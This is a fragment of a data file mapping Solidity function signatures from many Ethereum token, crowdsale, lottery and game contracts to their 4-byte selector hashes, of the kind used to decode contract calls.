"LinkEyeStandardToken(uint256,string,uint8,string)": "0xe0963ced", "JED()": "0x65879e72", "REDDCCOIN()": "0x78cfccb5", "FIBToken()": "0xf8e7577d", "Xandra()": "0x1fae75eb", "CECToken(uint256,string,string)": "0xf5156fba", "UruguayvsPortugal()": "0x3ae46aed", "UDA()": "0x2652b4a5", "catch_the_thief(address)": "0x9fe304a0", "rest_time()": "0xc252d844", "ptc_balance(address)": "0xa3e486d1", "_distribute(address,uint256)": "0x652db9ab", "getMsgSigner(bytes32,bytes)": "0x2f774e44", "getProveHash(address,bytes32,string,bool,uint256,bytes32,uint256)": "0x7026aa04", "getAccountState(bytes32)": "0x85b142ed", "claim(address,bytes32,string,bool,uint256,bytes32,uint256,bytes)": "0x6c965a81", "collectSellFee(address)": "0xa459ae28", "collectBuyFee(uint256,address)": "0xe40a7545", "changeTradingEnabled(bool)": "0x16925ee2", "HFCoin()": "0x30f6716f", "transferLockedMultiply(address[],uint256[],uint256[],uint256[])": "0x458d96bb", "transferMultiply(address[],uint256[])": "0xf493c848", "transferLockedFrom(address,address,uint256,uint256,uint256[])": "0x280f958e", "transferLocked(address,uint256,uint256,uint256[])": "0x94d5539d", "lockedAmountOf(address)": "0x8b9d6899", "claimAdmin(string)": "0xd5cfa94e", "removeAdmin(address,string)": "0x16b0fc55", "addAdmin(address,string)": "0xd16856ca", "isAdmin(address,string)": "0x1bea69e3", "removeRoleAll(string)": "0x17af4d8a", "divRemain(uint256,uint256)": "0x3717f34c", "IPETToken()": "0x69a479e2", "BlockChainShopCoin()": "0xe4e1aae6", "iBird()": "0x6e16f9ed", "CSELToken(uint256,string,string)": "0x31347482", "multitokensCount()": "0x6c69ab24", "SBK()": "0x9a960778", "ovatel()": "0x9924ad7c", "GAMEMAGICERC20(uint256,string,string)": "0x196fa707", "updateRatePlan(uint256,uint256,string,bytes32)": "0x074c32c4", "removeRatePlan(uint256,uint256)": "0x786e4799", "pushRatePlan(uint256,string,bytes32,bool)": "0x11461614", "updatePriceAndInventories(uint256,uint256,uint256,uint256,uint256,uint16)": "0x6bc1f1e4", "addInventories(uint256,uint256,uint256,uint16)": "0xbbb7eb64", "reduceInventories(uint256,uint256,uint256,uint16)": "0xde5dead6", "updateInventories(uint256,uint256,uint256,uint16)": "0xf3c505c2", "updatePrice(uint256,uint256,uint256,uint256,uint256)": "0xedb0bb3a", "updateBaseInventory(uint256,uint256,uint16)": "0x25635b68", "updateBasePrice(uint256,uint256,uint256,uint256)": "0xbe5e72e0", "approveOperatorTo(address,address,bool)": "0x35058a2a", "approveTokenTo(uint256,address)": "0x6a385043", "transferTokenTo(uint256,address)": "0x491a7904", "removeOrderOfVendor(address,uint256)": "0xa8150e72", "pushOrderOfVendor(address,uint256,bool)": "0x6cd44d55", "removeOrderOfOwner(address,uint256)": "0x28543417", "pushOrderOfOwner(address,uint256,bool)": "0x5ec5bc8e", "updateTokenBaseURI(string)": "0x2295ee5b", "getVendor(uint256)": "0x65de1eb3", "getVendors(uint256,uint256,bool)": "0xafdfb804", "getTokens(uint256,uint256,bool)": "0xeee94805", "getRatePlansOfVendor(uint256,uint256,uint256,bool)": "0x544f43e3", "getOrdersOfVendor(address,uint256,uint256,bool)": "0x4cb0c7a1", "getOrdersOfOwner(address,uint256,uint256,bool)": "0x600cf0d9", "ratePlanIsExist(uint256,uint256)": "0x6b65a834", "getInventory(uint256,uint256,uint256)": "0xee76c2d6", "getPrices(uint256,uint256,uint256[],uint256)": "0x644e8b24", "getRatePlan(uint256,uint256)": "0x762fdc0c", "getAuthorizeContract(uint256)": "0x900526b3", "getAuthorizeContractIds(uint256,uint256)": "0x5b12f1b6", "deauthorizeContractById(uint256)": "0x21be26ed", "authorizeContract(address,string)": "0x7d9375b8", "priceOfDate(uint256,uint256,uint256,uint256)": "0x1eae85cb", "pricesAndInventoriesOfDate(uint256,uint256,uint256[],uint256)": "0x21edbe24", "pricesOfDate(uint256,uint256,uint256[],uint256)": "0x6529d1c9", "inventoriesOfDate(uint256,uint256,uint256[])": "0xafab2b0f", "updateInventories(uint256,uint256[],uint16)": "0xf54d41db", "updatePrices(uint256,uint256[],uint16,uint256[],uint256[])": "0x8f38bf34", "updateBasePrice(uint256,uint256[],uint256[],uint16)": "0x6215f292", "_updateInventories(uint256,uint256,uint16)": "0x19bba58b", "_updatePrices(uint256,uint256,uint16,uint256[],uint256[])": "0x78698e45", "dateIsLegal(uint256)": "0xc07a32c4", "SponBToken(address,uint256)": "0x13f46d3e", "getRegister(string,string)": "0xc6f03aaa", "setNewRegister(string,string,uint256)": "0xf7678fda", "UBEX()": "0x7ab7fa9f", "confirmStaking()": "0x0c55d9a4", "returnMe()": "0x4b7ae9f6", "swapMe()": "0x24addfc0", "executeVerdict(uint256,bool)": "0x37b8db1a", "openDispute(address,string)": "0x89c0b25c", "setArbiters(address,address[])": "0x16cf1651", "commissionCheck()": "0x1d103139", "isInWhitelist(uint256,address)": "0x5d878b4f", "investorExists(address)": "0x5b83b7f1", "isDisputing(address)": "0x06e7b5ad", "assignPartition(address,uint256,uint256)": "0x08b6808c", "acceptOffer(address,uint256)": "0xb1b9e78d", "verdictExecuted(address,bool,uint256)": "0x0cc3ad77", "disputeOpened(address)": "0x6c996bbd", "withdrawOffer(uint256)": "0x8610f045", "setCurrentFundingRound(uint256)": "0x66971c8a", "addRoundPrice(uint256,uint256,uint256,address[])": "0x4c36cf16", "setArbitration(address)": "0x29388f8d", "setSwapper(address)": "0x9c82f2a4", "approveRound(address)": "0x095d5a70", "_withdrawTokens(address)": "0x2e94c0df", "iotpowerToken()": "0xb381cfe5", "showMainERC20()": "0x3feff510", "winthdraw(address,address,uint256)": "0xcca4f3c5", "updateMirroir(address,address)": "0x73646c91", "Main()": "0xd62b6f7e", "contructor()": "0x969fbf12", "getLink(address)": "0x9d6abe4f", "setLink(string)": "0x19337d6c", "withdrawSettle(bytes32,bytes32,bytes32)": "0xfff57ba3", "verifyWithdrawUpdate(bytes32,bytes32,uint256,uint256)": "0xfd0b9dc2", "verifyWithdraw(bytes32,bytes32)": "0xf00ff174", "verifyUpdateTransaction(bytes32,uint256,address,uint256,address,uint256)": "0xf2e552a5", "withdrawBalance(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0xca051844", "getTimeoutBlock(bytes32)": "0x287e85e9", "getTimeLock(bytes32,bytes32)": "0x8647a5dc", "getClosingSettle(bytes32)": "0x93c2c7f0", "getChannelPartners(bytes32)": "0xa1fa566e", "getSettlingTimeoutBlock(bytes32)": "0xd2970120", "getChannelClosingSettler(bytes32)": "0xa870a0a5", "getChannelExist(bytes32)": "0x9a45e3fe", "getChannelStatus(bytes32)": "0xcc0b94b7", "getChannelBalance(bytes32)": "0x093c4ee6", "sethardcap(uint256)": "0x706a3604", "setsetperiod(uint256)": "0x7a16c6dd", "setrate(uint256)": "0xba34c8f1", "setPerOneEther(uint256)": "0xdca44b39", "CrowdsaleMCS()": "0xe7aa8ed5", "KAL3Token()": "0xe0e8a555", "ShowerToken()": "0x18423074", "CerberusNetwork()": "0xd5909149", "CORECoin()": "0x622a10fd", "createRandomCharacter()": "0xb92ce1a7", "_determineDefence(uint256)": "0xeb0f5186", "getCardByOwner(address)": "0xce1c1538", "feedAndMultiply(uint256,uint256)": "0x0dedffb8", "createCard(string)": "0x46a672bd", "_createCard(string,uint256)": "0x7148ba36", "_createRandomDna(string)": "0x8a56e85e", "awe()": "0xb1f32231", "IanCoin()": "0x8cd8bd05", "MyTestGameToken()": "0x20a3952b", "participateBuyback()": "0x32a8e74c", "finalizeBuyback()": "0xeaec75aa", "activateBuyback(uint256,uint256)": "0x601fba02", "forceBuyback(address,uint256)": "0x4484a2a6", "unfreezeTrading()": "0x9782c9ef", "freezeTrading()": "0x5fd33b1b", "mintInvestment(string,string,uint256,address,uint256)": "0xe88b0067", "forceBuyback(address)": "0x40b60b85", "_unstake(address)": "0xaf9ee81d", "forceUnstake(address)": "0x44f26d89", "verifyHolder(address,string)": "0xeaacc753", "participate(address)": "0xb91038c7", "DEAWCOIN()": "0x54cfcd1b", "IntigoTest()": "0x523f53a6", "_includes(string[3],string)": "0x444257a3", "unilateralRefund(bytes32)": "0x7fabbd7b", "create(string,string,uint32,int256,string,address)": "0xf70bbdaf", "refundGame(uint256)": "0xd7260cba", "getPossibleWinAmount(uint256,uint256)": "0x30bdd344", "revealResultUncleMerkleProof(uint256,uint40)": "0x997995ec", "revealResult(uint256,bytes32)": "0x8853636b", "placeGame(uint8,uint256,uint256,uint8,bytes32,bytes32)": "0x319f21b6", "increaseJackpot(uint256,uint256,uint256)": "0x24c31975", "setCroupier(address)": "0xf8bb201c", "ViralToken()": "0x76858faf", "setLastRegistration(string,int256,uint256)": "0x9a31ac53", "getLastRegistration(string,int256)": "0x497f3132", "disableBondingCurve()": "0x705a940a", "setLockStatus(bool)": "0xd1fa94d0", "_send(address,uint256)": "0x9d0617f9", "_directTransfer(address,uint256)": "0x371ecfde", "balanceComisionOf(address)": "0x5cec5ded", "softCapCompleted()": "0xe11b09e0", "voteSnapshotBalanceAutoBatch(address[],uint256[])": "0x3231a2b9", "voteSnapshotBalanceAuto(address,uint256)": "0x85dacd5b", "voteSnapshotBalanceBatch(address[],uint256[])": "0x50eba4eb", "withdraw123()": "0x85a09f6f", "HK168coin()": "0xbadec5b4", "SingularityTest34()": "0x16b14e19", "addContract(address,address,uint256)": "0xd8b9a2a0", "getHashOf(address)": "0xbb43a11e", "blanceOf(address)": "0x12568c24", "withdrawTatAmount(uint256)": "0x39527ed6", "backTo(address)": "0xdc91868f", "withdrawTo(string,address)": "0xced4c064", "recharge(address,uint256)": "0x36351c7c", "recharge(bytes32,uint256,address)": "0x72cf3b40", "setTatAddress(address,address)": "0x64de4c1d", "teansferFrom(address,address,uint256)": "0x19656b46", "setBondFundAddress(address)": "0xddbe92d3", "AcceptsExchange(address)": "0xc486301b", "commitmentsOf(address,address)": "0xcc7e930c", "createOrder(address,address,uint256,uint256,uint256)": "0x518e62db", "CoinBirdDEX()": "0xdcef8165", "createProxy(string)": "0x9da8e7e2", "upgradeTo(string)": "0x6493e64c", "storeBubbleSort(uint256[])": "0x438d1bd7", "bubbleSort(uint256[])": "0xe30c36f1", "revokeOperatorTranche(bytes32,address)": "0x9d68521a", "authorizeOperatorTranche(bytes32,address)": "0x1b953909", "defaultOperatorsTranche(bytes32)": "0x663d6612", "operatorSendTranche(bytes32,address,address,uint256,bytes,bytes)": "0x1bb3fb67", "balanceOfTranche(bytes32,address)": "0x01788d56", "ForkiToken()": "0x0d157352", "VIRTUALTALK()": "0x6b441abc", "KareToken()": "0x1b880bcf", "verifyXOR(bytes32,bytes32,uint8)": "0x83dbc55b", "constructHashRs1Rs2(bytes,bytes)": "0x2ad389e3", "storeStub(address,bytes32,bytes32)": "0xa766f3d1", "checkStubs(bytes32,bytes32,address)": "0x576cecdc", "verifyLottery(uint8,bytes32,bytes)": "0xbe46bffb", "getSHA256(bytes)": "0xa581c333", "verifyRs1Hash(bytes,bytes32)": "0xf2d50151", "getEscrow(address)": "0xa26d494d", "BLM()": "0x1b2bf378", "subdomainTarget(string,string,string)": "0x66167663", "subdomainOwner(string,string,string)": "0x0ab4c065", "domainOwner(string,string)": "0x57014fee", "newSubdomain(string,string,string,address,address)": "0xbeea7bfb", "safeTransfer()": "0xf910feaa", "CrowdSale(uint256,uint256,uint256,address)": "0x6bf5595d", "OPLTest()": "0xdac54daa", "Twoandtwo()": "0x2e63cfe1", "answer(uint256)": "0x06f70295", "checkPermission(address,address)": "0x1a160fe9", "VGWToken(address)": "0x7518af71", "lrs(uint256)": "0x762506b6", "getData(string)": "0xae55c888", "addMessage(string,string)": "0x631e0c69", "KryptoGiftsMessages()": "0x1ed1d0f7", "SingularityTest17()": "0xf1d308d5", "ALH2()": "0x247baa3e", "kcck256strstr(string,string)": "0x52848d8d", "kcck256str(string)": "0x575b8cc8", "deleteInt(bytes32)": "0x8c160095", "deleteBool(bytes32)": "0x2c62ff2d", "deleteBytes(bytes32)": "0x616b59f6", "deleteString(bytes32)": "0xf6bb3cc4", "deleteUint(bytes32)": "0xe2b202bf", "deleteAddress(bytes32)": "0x0e14a376", "setInt(bytes32,int256)": "0x3e49bed0", "setBool(bytes32,bool)": "0xabfdcced", "setBytes(bytes32,bytes)": "0x2e28d084", "setString(bytes32,string)": "0x6e899550", "setUint(bytes32,uint256)": "0xe2a4853a", "setAddress(bytes32,address)": "0xca446dd9", "getInt(bytes32)": "0xdc97d962", "getBool(bytes32)": "0x7ae1cfca", "getString(bytes32)": "0x986e791a", "getUint(bytes32)": "0xbd02d0f5", "getTotalAirDroppedAmount()": "0x40992e9d", "getRemainingToken()": "0x3efe6441", "getTotalNumberOfAddressesReceivedAirDrop()": "0xc7b160db", "receiveAirDrop()": "0xc1fae25b", "isValidAirDropForIndividual()": "0x70cf7508", "isValidAirDropForAll()": "0x8b08292d", "invalidateCertificate(bytes32)": "0x803587ae", "printCertificate(string,string,string,uint16,string)": "0x746a9af2", "hasAccess(address,uint8)": "0xa1b1cb43", "revokeAccess(address,uint8)": "0x6f925535", "grantAccess(address,uint8)": "0x87ed1bd0", "approveAndCall(address,address,address,uint256,uint256,uint256,uint256,bytes,bytes)": "0xdc47e5b7", "signatureBurnStatus(bytes32)": "0x09417110", "burnSignature(address,address,address,uint256,uint256,uint256,uint256,bytes)": "0x3e9ed7e4", "tokenAllowance(address,address,address)": "0x8e8758d8", "transferTokensFromWithSignature(address,address,address,uint256,uint256,uint256,uint256,bytes)": "0xa9ff2a5e", "withdrawTokensFromWithSignature(address,address,address,uint256,uint256,uint256,uint256,bytes)": "0x20acbc83", "approveTokensWithSignature(address,address,address,uint256,uint256,uint256,uint256,bytes)": "0xa51fbb3f", "getLavaTypedDataHash(address,address,address,uint256,uint256,uint256,uint256)": "0xc6d2cb6a", "transferTokensFrom(address,address,address,uint256)": "0x4b17bdd8", "approveTokens(address,address,uint256)": "0x912d6e28", "withdrawTokensFrom(address,address,address,uint256)": "0xb0e0ef09", "depositTokens(address,address,uint256)": "0x39dc5ef2", "LavaWallet()": "0xf8f6882e", "EIB(string,string,uint8,uint256)": "0xce2293ca", "rewiewToken()": "0xe1dace1a", "setWithdrawWallet(address,address)": "0x8e7547cb", "setNewValue()": "0xa801fd63", "VNDCash(uint256,string,uint8,string)": "0xc523ef11", "CloseGift()": "0x3f7e2120", "OraclePoloniex()": "0x9556b05d", "TeamTokenHolder(address,address,address)": "0x82076979", "_getTime()": "0xff63ac3b", "_calcPhasesPassed()": "0x0e5004e6", "_changeClosingTime()": "0x52700ef0", "_preValidateAssign(address,uint256)": "0x15ed97c5", "_processTokensPurchase(address,uint256)": "0xdd3f2893", "_processTokensAssgin(address,uint256)": "0xbdc74e23", "_hasClosed()": "0xe1c3fb91", "assignTokensToMultipleInvestors(address[],uint256[])": "0x1cbfbe47", "setTeamTokenHolder(address)": "0x0a67dfbb", "HardcapToken()": "0xe02b8b29", "changeEthAddress(address)": "0x416f5483", "GWTCrowdsale()": "0x2bc3a349", "startTokenSale()": "0x79798ccb", "startPreSale()": "0x55dd574c", "startPrivateSale()": "0x338dbf59", "closeMinting()": "0x87491c60", "mintFor(address,uint256)": "0xda1919b3", "modifySupplyLimit(uint256)": "0x7dde0138", "setPeriodLength(uint256)": "0x1c5633d7", "setTokenOwner(address)": "0x18e02bd9", "setStage(uint256)": "0x3eb1d777", "switchPeriod()": "0xb3f3e673", "isInActiveStage()": "0xf0933ab9", "LIANG(uint256,string,string)": "0x0e0e4acc", "Mytoken(uint32,string,uint8,string,address)": "0xe71efd18", "FreeToken()": "0x4e8c2927", "_humanSender(address)": "0xe040f3e1", "getOfferAmount(uint256)": "0xcb15d07b", "getOfferor(uint256)": "0xc1309aea", "canceloffer()": "0x5ae81492", "_canceloffer(address)": "0xfd0e4695", "SimplePHXSalesContract()": "0x314989b2", "TeacherCoin()": "0x0c2b3eda", "BooMToken()": "0xdd49f1c8", "withdaw(uint256)": "0xea92dd1d", "StartGame(uint256)": "0x12333b32", "changeMinBet(uint256)": "0xe8147a25", "Hybrid(uint256,string,uint8,string)": "0x76e9d4fb", "allFamily(uint256,address)": "0xe371dfdb", "LatiumX()": "0x00012f8b", "updateRest()": "0xca76e548", "updateTabRap(bytes32)": "0x9edcebbb", "rhi()": "0x338a0261", "chi()": "0xc92aecc4", "din()": "0xe0ae96e9", "depositTokenForUser(address,uint256,address)": "0x3c2e2a75", "depositForUser(address)": "0x6a523c5e", "migrateFunds(address,address[])": "0x515fdde3", "setSuccessor(address)": "0x10e5bff8", "changeFreeUntilDate(uint256)": "0xa70e82d4", "setVerified(address,bool)": "0x9cf5c613", "modifyToken(address,uint256,string,string,string,string,bool)": "0xfb06603c", "addToken(address,uint256,string,string,string,string)": "0xa1057852", "EthermiumTokenList(address,address,uint256,uint256)": "0xa2420f73", "CrystalSkull()": "0xf343ccbd", "calculateBonusTierQuotient()": "0xceef3800", "resetPendingContribution(address)": "0x8d539b35", "addAcceptedContribution(address,uint256,uint256)": "0xa707300f", "addPendingContribution(address,uint256,uint256)": "0xc9db2bbd", "participantClawbackEther(uint256)": "0x003de230", "declineKyc(address)": "0x2562b427", "acceptKyc(address)": "0x358cc6f6", "ownerWithdrawParsecs(uint256)": "0xef8c1d86", "ownerDeclareRefundFinish()": "0x2603f70c", "ownerDeclareRefundStart()": "0x80a51c5e", "ownerDeclareFailure()": "0xa65ae513", "ownerFinishContract()": "0x1b4fa639", "ownerStartContract()": "0x06d832a3", "ownerPowerUpContract()": "0x688e69d8", "ownerSetAuditor(address)": "0xe85ac5b0", "emergencyClawbackEther(uint256)": "0xbf56cc08", "emergencyRefundContract()": "0xd6a5e546", "emergencyWithdrawParsecs(uint256)": "0x51819edb", "ParsecCrowdsale(address,address,address)": "0x268855a4", "ParsecTokenERC20()": "0x79f59f09", "getDeploytimeBlocktimeBlocknumber()": "0xa0cfbc1b", "BlockRxToken(uint256)": "0x96c7a2a3", "claimToken(address)": "0x32f289cf", "generateRandomPerformance()": "0xc6cf1c7f", "transferECOMTokenToContract(uint256)": "0x4481a486", "checkCompanyNameAvailability(bytes32)": "0x2d5a858c", "getCompanyCreationCost()": "0x21e866be", "getTopCompanyAtIndex(uint256)": "0xfdcf6f16", "getTopCompanyCount()": "0x5ffce121", "getTopCompanyBlocksInBetween()": "0x6e3d5a9d", "getTopCompanyStartBlock()": "0xd598b2c5", "getTopCompanyStartPrice()": "0x07be6ef8", "transferSubcontractsOwnership(address)": "0x655bb0e8", "updateFactoryContract(address)": "0xc2fb538e", "updateCostContract(address)": "0x130067ca", "updateRandContract(address)": "0x57c3b376", "updateLogoUrl(bytes32,bytes32)": "0x85e57f3c", "claimMyToken()": "0x9c58be11", "runSuperPrivilegeLuckyDraw()": "0xb488f00e", "putCompanyOnsale(bytes32,uint256)": "0x19b587ad", "permanentlyOwnMyCompany(bytes32)": "0x7b7d8888", "createCompany(bytes32,bytes32,uint256)": "0xcf456865", "purchaseTopCompany(bytes32,bool)": "0x1ae8494e", "purchaseCompany(bytes32,bool)": "0x42173c98", "updateMinCompanyValue(uint256)": "0x8f48c14a", "updateOldOwnerProfit(uint256)": "0x6a7d6b52", "updateLogoFee(uint256)": "0x126d9882", "updateUserCreatedPerformance(uint256)": "0x8aa94f56", "updateSuperPrivilegeParams(uint256,uint256)": "0xdf117c47", "updateBlocksPerDay(uint256)": "0xc6a5d5da", "ownerApprove(address,uint256)": "0x029d1ecd", "removeCompany(bytes32)": "0x0060c778", "getCompanyByName(bytes32)": "0x64a5a632", "canBuyCompany(bytes32)": "0x335665c4", "rand(address)": "0xc7c625ee", "calculatePreviousPrice(uint256)": "0x8c2f6458", "decreaseOffsaleCountByOne()": "0x98d4e59c", "increaseOffsaleCountByOne()": "0x8ad5d779", "increaseCompanyCountByOne()": "0x2959275d", "getOffsaleCount()": "0x9dd7e749", "getCreationCost()": "0xa1786803", "validateCompanyName(bytes32)": "0x5732788a", "lowerCase(bytes32)": "0x8c7698df", "GetURL(address,uint256)": "0xec2b189c", "UploadURL(uint256,string)": "0xfdaa2632", "UploadIMG()": "0xf92caf3a", "cybToken()": "0x7a12cdb8", "Zeinun()": "0x51cc508d", "HGToken()": "0x43f6c741", "MODXCOIN()": "0x707fe454", "deadDragons()": "0x52f6ca76", "getTransactionAtIndex(address,uint256)": "0x43b89c62", "totalTransactionCount(address)": "0x959e90ff", "distributionCap()": "0xcd63d930", "Distribution(address,address,uint256,uint256)": "0x6d15a659", "GotecoinToken()": "0x59c44539", "setdecimals(uint256)": "0x1f7ab15d", "setname(string)": "0x2cefeb07", "distributeDEXT(address[],uint256,uint256)": "0x3a0aec6c", "DEXToken()": "0x628c2778", "incGenLabFight(uint256)": "0xdd1d5e64", "incGenLabFace(uint256)": "0xdaf47ba3", "addMutagenFight(uint256,uint256)": "0x24534192", "addMutagenFace(uint256,uint256)": "0x61c6a8e4", "incFightToDeathWin(uint256)": "0xa9a07af9", "incFightLose(uint256)": "0x5aeee9f9", "incFightWin(uint256)": "0x2454d1f0", "setLastAction(uint256,uint256,uint8)": "0xaf24cba2", "thawAddress(address)": "0x2cd2338f", "EnergiToken()": "0x6c6fbd70", "userPayout()": "0xf58b4554", "userReinvest()": "0x97e1f48b", "userDeposit(address)": "0xd1260edd", "publicGetDeposit(uint256)": "0x038339ab", "GouBi()": "0x55f2dcb2", "privateTokenCap()": "0xa497d8c6", "oraclizeBytes()": "0x16c393a6", "bonusTake()": "0xaf7912a1", "_money()": "0x4a443471", "monarchyStartReward()": "0x9c2412a2", "frozenWallet4y()": "0xd8ac289f", "GAME_END()": "0xda5f3ac1", "lastCampaignID()": "0xe99a7dca", "preSaleTokensLimit()": "0x0041edee", "totalWeiRaisedDuringPhase1()": "0x4b656b41", "exerciseOptionsDeadline()": "0x2059c548", "FACTOR_3()": "0xd6528231", "TOTAL_TOKENCAP()": "0xac20e2a0", "requestTime()": "0xd7fd0e77", "durationInMinutes()": "0xceb8ee8b", "getBaseToken()": "0x98acd7a6", "advisorTokenWallet()": "0xc5f5ce21", "bonusEndTime250()": "0x03cba01e", "globalPresaleLimit()": "0x8a39ebdc", "companyWalletAddress()": "0x074e8940", "icoClosedManually()": "0xaccd932b", "firstRefundRoundRateDenominator()": "0x1014a29e", "getPrivacyCoins()": "0x70152dcf", "lastBurn()": "0xbbce2c17", "IsFrozen()": "0x41dbb51e", "spreadPercent()": "0xf457547a", "thresholdAmount()": "0x28f4dbb6", "nextFreeCount()": "0xc1d9e273", "cardCost()": "0xe58172b1", "sumICO2()": "0xd5a4726b", "commissionFee()": "0x6fb1eb0c", "secondStageCap()": "0x51142cc3", "MToken()": "0x45461e78", "TIER2END()": "0x045ff49a", "juicyBonus()": "0xbfc84528", "ETH_HARD_CAP()": "0x65d967b0", "canAcceptPayment()": "0x160e915f", "isFinalize()": "0x671e4405", "limitedSale()": "0xbe471027", "publicSaleTokenPrice()": "0xc7e04670", "onSale()": "0x326687b9", "MAX_LRC_DEPOSIT_PER_ADDRESS()": "0xd0225e9e", "maxProfitDivisor()": "0x43c1598d", "FIRST_VOLUME_BONUS()": "0xe7b9aaef", "loseNum()": "0xeca10286", "addressFounders()": "0x5451a1e1", "balances_available_for_crowdsale()": "0x78e870cd", "presaleFinalized()": "0x6d498093", "getNumOfRickHolders()": "0xc33df4ba", "ownersEth()": "0xc7c8c424", "totalAuctions()": "0x16002f4a", "oraclize_gaslimit()": "0xcd233e25", "bonusRatePeriodTwo()": "0x3a7749c0", "ADVISOR_STAKE_TWO()": "0x53f6f01f", "MAXROUNDS()": "0xa5f357de", "INTREPID_PRICE_THRESHOLD()": "0x4401c905", "monsterNFT()": "0x678a1013", "totalEthSales()": "0xd935c8b4", "icoEnded()": "0x585ac3e8", "maxTokensToDistribute()": "0xbb68b86f", "mediumSize()": "0xafbae469", "pausedPublic()": "0x24bb7c26", "rinkeby3()": "0x0e60de7a", "periodSalesLimit()": "0x704d4051", "FOUNDATION_POOL_TOKENS()": "0x9e43692c", "lastLottoTime()": "0xd1e692eb", "makerDaoContract()": "0x77241a5f", "marketingPool()": "0xbbc7d0b9", "totalInfected()": "0x00014502", "COPPER_AMOUNT_TPT()": "0xb5809c9b", "businessersTotalBalance()": "0xb3e9da0c", "rewardPromille()": "0x309e21a9", "applauseCashCrowdsale()": "0xb8a4a064", "raisedFunding()": "0x49ef026f", "registerAgent()": "0x35eb5208", "tokenToEtherRate()": "0x40520f85", "mFUNDING_CURRENT_DURATION()": "0xb86397e7", "slammerTime()": "0x7712c870", "lastBlock_a6Hash_uint256()": "0x3a0f5500", "indexPaidAffiliate()": "0x59f4bbd2", "endorsements()": "0xb5ae4519", "weightsApportionDecimals()": "0xcd69a7f1", "totalPilfered()": "0x369cd460", "rateFirstWeekEnd()": "0x2a1be747", "icoDeadline()": "0x33cf3ca0", "distributed()": "0xf84b903e", "earlyWallet()": "0x35ec6dab", "plantedRate()": "0x081d203e", "mtcDailySpent()": "0xd02e5cfb", "vestingDateEnd()": "0xd8353b75", "isInRoundOneState()": "0x5962581e", "etherRatioForInvestor()": "0x95e2a953", "market2()": "0x957287ce", "ownerDailyWithdrawal()": "0xf3ca29b1", "recruitHeroFee()": "0xfe5ff154", "option20symbol()": "0x8cc78a40", "dayStartTime()": "0x08378040", "end_Dec_21_2017()": "0x7ad59e20", "lotteryStart()": "0xcd8cc844", "GetAccountIsNotFrozenCount()": "0x3c6403b4", "getBirthCut(uint256)": "0xc8852b5b", "getBabyMommas(uint256)": "0x87e89845", "getBabyMakinPrice(uint256)": "0xc65b490e", "getArkData(uint256)": "0xe23cbad1", "autoBirth(uint256)": "0x7f9d314e", "checkBirth(uint256)": "0x61fc65a0", "createBabies(uint256[],uint256[],uint256[],uint256[])": "0x899ae006", "createBaby(uint256,uint256,uint256,uint256)": "0xde812733", "createMultiple(uint256[],uint256[],uint256[],address[],uint8[])": "0x67de80db", "createToken(uint256,uint256,uint256,address,uint8)": "0x8725d6be", "resolveGameByHand(uint32,uint32)": "0x3b22c8e3", "cancelGame(uint32)": "0xf8d420a1", "redeemToken(uint256)": "0x013054c2", "buyToken(uint32,uint32,address)": "0xd5ec40af", "addGame(string)": "0xe89826ac", "freezeGame(uint32,bool)": "0x92736527", "CryptoSportZ()": "0xcc08ebf6", "getStatGames()": "0xdffe0a63", "getTokensByGame(uint32)": "0xa43c6002", "getUserTokensByGame(address,uint32)": "0x2eb56ad4", "getSumInByGame(uint32)": "0x8660b32b", "getCountTokensByGame(uint32)": "0x18a6dec5", "getBetsMas(uint32)": "0x62d246a4", "getGameByID(uint32)": "0x1604901b", "getPriceTicket()": "0x483f5082", "setMinBlockPurchase(uint256)": "0x339f890d", "setWeiPerBlock(uint256)": "0x52c05ca5", "blocksForWei(uint256)": "0xc8ce30b0", "transferOwnCoins(address,uint256)": "0x4f945a8a", "claimMigrate()": "0xbddf66ff", "toggleMigrationStatus()": "0xf3191443", "toggleTokenSaleOnHold()": "0xf653d286", "getFinalSupply()": "0x47e2688d", "grantTokensByShare(address,uint256,uint256)": "0x3a0f12dc", "tokenAmount(uint256,uint256)": "0xe7b83730", "RexToken(uint256,address,address)": "0xfd8c6fe4", "reap(address)": "0x8af9f493", "prep(address,uint8)": "0xf4a8619a", "buyObject(address)": "0x828f1b42", "getNum()": "0x67e0badb", "setNum(uint256)": "0xcd16ecbf", "MomaCoin()": "0x66b0a536", "getNumbersOfPick(uint256,uint8)": "0x4cbf3d4c", "getMyTicketList(bool,uint256,uint256)": "0xcea9707a", "getAllGames(bool,uint256,uint256)": "0x213aedb8", "getGameInfoById(uint256)": "0xd739aaf8", "getRefund(uint256)": "0xd2f0be99", "getWinningPrize(uint256)": "0xdcae2cb4", "openResult(uint256,uint8[])": "0x0a1432f7", "cancelTicket(uint256)": "0xee355b1f", "buyTicket(uint256,uint8)": "0xea8dc8d0", "updateTicketStatus(uint256,uint8)": "0xa460b817", "parseTicket(uint256)": "0x3f8e0298", "generateTicketData(uint256,uint8,uint8)": "0x3898ee61", "getGamesLength()": "0x654f1ccb", "addOneGame(string,uint256)": "0xcce0c0fa", "NBAONLINE()": "0xde6eb4be", "setICOContract(address,address)": "0xa2dd3283", "BMToken()": "0x3c71faf2", "ChrisBell(uint256,string,uint8,string)": "0xcec17a12", "DACToken()": "0xc50d725c", "CcStandardToken(uint256,string,uint8,string)": "0x23ac9ae2", "buyOptions(address,uint256,string)": "0x05fc0586", "executeOptions(address,uint256,string)": "0xc75514e8", "GVOptionProgram(address,address,address)": "0x4d2a99a5", "executeOption(address,uint256)": "0x18287ef2", "remainingTokensCount()": "0x06b2fe22", "buyOptions(address,uint256)": "0xb40f6f4c", "GVOptionToken(address,string,string,uint256)": "0x9556a31d", "setPriceAndRate(uint256,uint256)": "0xdf4bd18d", "DukatToken()": "0xb39d6b7b", "ThundervsJazz()": "0x8069dc2d", "Radix()": "0x82507c5a", "hash(uint64[8])": "0x7ab91b3a", "calculateVestedTokens(uint256,uint256,uint256,uint256)": "0xfdf3b97f", "totalVestedTokens()": "0x51e09631", "claimableTokens()": "0xbab8fe40", "claimTokensFor(address)": "0xee0b04be", "grantVestedTokens(address,uint256,uint256,uint256)": "0x2f3d8035", "TokenVesting()": "0x9951fc72", "withdrawal(uint256)": "0x835fc6ca", "SOCToken(uint256)": "0x15334fa7", "updateBytes20inBytes(bytes,uint256,bytes20)": "0x241e0fa0", "getRequestHash(bytes,address[],uint256)": "0x09f70d2e", "checkRequestSignature(bytes,address[],uint256,bytes)": "0x4b0a0d04", "fundOrderInternal(address,address,uint256)": "0xf06ef632", "refundInternal(bytes32,address,address,uint256)": "0x84d8529f", "paymentInternal(bytes32,uint256[])": "0x76e2bbc7", 